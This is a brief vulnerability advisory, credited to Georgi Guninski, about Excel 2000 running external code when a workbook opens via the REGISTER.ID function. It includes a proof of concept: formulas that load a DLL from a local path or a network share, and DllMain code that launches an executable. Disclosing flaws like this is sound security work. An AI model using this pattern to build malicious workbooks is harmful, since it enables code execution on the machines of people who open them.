Excel 2000 Allows External Code Execution
Reported July 11 by Georgi Guninski

VERSIONS EFFECTED
Excel 2000 (possibly other versions)

DESCRIPTION

Excel can be made to execute code upon opening an Excel Workbook file. The problem resides in the Register.ID function, which is used to call functions that reside in external DLLs.

DEMONSTRATION

This code Copyright 2000 Georgi Guninski

-------dll3.xls--------------------------------------------
=REGISTER.ID("C:\DLL1.DLL";"dllmain";"a")
=REGISTER.ID("\\UNC\SHARE\DLL1.DLL";"dllmain";"a")
-----------------------------------------------------------

-------dll1.cpp--------------------------------------------
BOOL APIENTRY DllMain( HANDLE hModule,
                      DWORD ul_reason_for_call,
                                 LPVOID lpReserved
                                   )
\{
  switch( ul_reason_for_call )
   \{
    case DLL_PROCESS_ATTACH:
    // Initialize once for each new process.
    // Return FALSE to fail DLL load.
    // Note: For NT/2000 you may need to move the following code
outside the switch()
        MessageBox(NULL, "Hello world!", "Info", MB_OK);
        MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may need to   create it.", "Info", MB_OK);
        system("C:\\TEST.EXE");
        break;
......
---------------------------------------------------

A demonstration is also available at Georgi"s Web site:
http://www.nat.bg/~joro/excel2.html

VENDOR RESPONSE

Microsoft is aware of this problem however no response was known at the time of this writing.

CREDIT
Discovered by Georgi Guninski